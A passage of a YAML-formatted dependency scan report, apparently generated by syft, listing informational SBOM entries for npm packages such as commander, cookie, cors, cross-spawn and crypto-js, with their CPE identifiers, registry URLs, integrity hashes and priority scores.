spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/combined-stream@1.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz + integrity: sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg== + dependencies: + delayed-stream: ~1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: df1825804c4b40ea + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: commander 10.0.1' + title: commander 10.0.1 + description: 'Package discovered: commander 10.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 68cb0d0425b8ec71 + name: commander + version: 10.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/commander@10.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/commander/-/commander-10.0.1.tgz + integrity: sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b275a043135b9b63 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: commander 4.1.1' + title: commander 4.1.1 + description: 'Package discovered: commander 4.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6ef23c8bf6c64c11 + name: commander + version: 4.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/commander@4.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/commander/-/commander-4.1.1.tgz + integrity: sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: af21f9856150d16c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: concat-stream 1.6.2' + title: concat-stream 1.6.2 + description: 'Package discovered: concat-stream 1.6.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ee26fc9f2aa2694f + name: concat-stream + version: 1.6.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/concat-stream@1.6.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz + integrity: sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw== + dependencies: + buffer-from: ^1.0.0 + inherits: ^2.0.3 + readable-stream: ^2.2.2 + typedarray: ^0.0.6 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6a853859517f2ba3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: config-chain 1.1.13' + title: config-chain 1.1.13 + description: 'Package discovered: config-chain 1.1.13' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f8adcbfce494f378 + name: config-chain + version: 1.1.13 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/config-chain@1.1.13 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz + integrity: sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ== + dependencies: + ini: ^1.3.4 + proto-list: ~1.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aa020ae4ab2eadc3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: content-disposition 0.5.4' + title: content-disposition 0.5.4 + description: 'Package discovered: content-disposition 0.5.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5a8a76bf321e2afc + name: content-disposition + version: 0.5.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/content-disposition@0.5.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz + integrity: sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ== + dependencies: + safe-buffer: 5.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9a45820ffdb99ef9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: content-type 1.0.5' + title: content-type 1.0.5 + description: 'Package discovered: content-type 1.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e6774efb67a1cd80 + name: content-type + version: 1.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/content-type@1.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz + integrity: sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 475f89190adc46cd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cookie 0.7.2' + title: cookie 0.7.2 + description: 'Package discovered: cookie 0.7.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dabea341270367ac + name: cookie + version: 0.7.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cookie@0.7.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz + integrity: sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 980ccdca1420305a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cookie-signature 1.0.7' + title: cookie-signature 1.0.7 + description: 'Package discovered: cookie-signature 1.0.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c3cdc836e23cbee4 + name: cookie-signature + version: 1.0.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/cookie-signature@1.0.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz + integrity: sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8ea7108a43fc0ad4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: core-util-is 1.0.3' + title: core-util-is 1.0.3 + description: 'Package discovered: core-util-is 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9bfb1fb9a1cd315e + name: core-util-is + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/core-util-is@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz + integrity: sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 171e24f79e6f61b0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cors 2.8.6' + title: cors 2.8.6 + description: 'Package discovered: cors 2.8.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c8f0caa18c740c23 + name: cors + version: 2.8.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cors@2.8.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cors/-/cors-2.8.6.tgz + integrity: sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw== + dependencies: + object-assign: ^4 + vary: ^1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 24841e3ab0fadbb6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + startLine: 0 + message: 'Package discovered: coverallsapp/github-action master' + title: coverallsapp/github-action master + description: 'Package discovered: coverallsapp/github-action master' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cbf693155383c51f + name: coverallsapp/github-action + version: master + type: github-action + foundBy: github-actions-usage-cataloger + locations: + - path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml + annotations: + evidence: primary + licenses: [] + language: '' + cpes: + - cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github-action:master:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:coverallsapp\/github-action:coverallsapp\/github_action:master:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github-action:master:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:coverallsapp\/github_action:coverallsapp\/github_action:master:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github-action:master:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:coverallsapp\/github:coverallsapp\/github_action:master:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:github/coverallsapp/github-action@master + metadataType: github-actions-use-statement + metadata: + value: coverallsapp/github-action@master + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c42474dc158d56dd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cross-fetch 3.2.0' + title: cross-fetch 3.2.0 + description: 'Package discovered: cross-fetch 3.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1ef521ded724ae55 + name: cross-fetch + version: 3.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/cross-fetch@3.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz + integrity: sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q== + dependencies: + node-fetch: ^2.7.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ab79d32b8583840a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cross-spawn 7.0.6' + title: cross-spawn 7.0.6 + description: 'Package discovered: cross-spawn 7.0.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 043761526fd95886 + name: cross-spawn + version: 7.0.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cross-spawn@7.0.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz + integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA== + dependencies: + path-key: ^3.1.0 + shebang-command: ^2.0.0 + which: ^2.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8714b6edd2c6df07 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: crypto-js 4.2.0' + title: crypto-js 4.2.0 + description: 'Package discovered: crypto-js 4.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2eb6177b3fd9fb78 + name: crypto-js + version: 4.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:crypto-js:crypto-js:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:crypto-js:crypto_js:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:crypto_js:crypto-js:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:crypto_js:crypto_js:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:crypto:crypto-js:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:crypto:crypto_js:4.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/crypto-js@4.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/crypto-js/-/crypto-js-4.2.0.tgz + integrity: sha512-KALDyEYgpY+Rlob/iriUtjV6d5Eq+Y191A5g4UqLAi8CyGP9N1+FdVbkc1SxKc2r4YAYqG8JzO2KGL+AizD70Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5c9f6165bd9afd4d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: cssesc 3.0.0' + title: cssesc 3.0.0 + description: 'Package discovered: cssesc 3.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7ab312baa29fde7a + name: cssesc + version: 3.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:cssesc:cssesc:3.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/cssesc@3.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz + integrity: sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e510323d242254fb + ruleId: 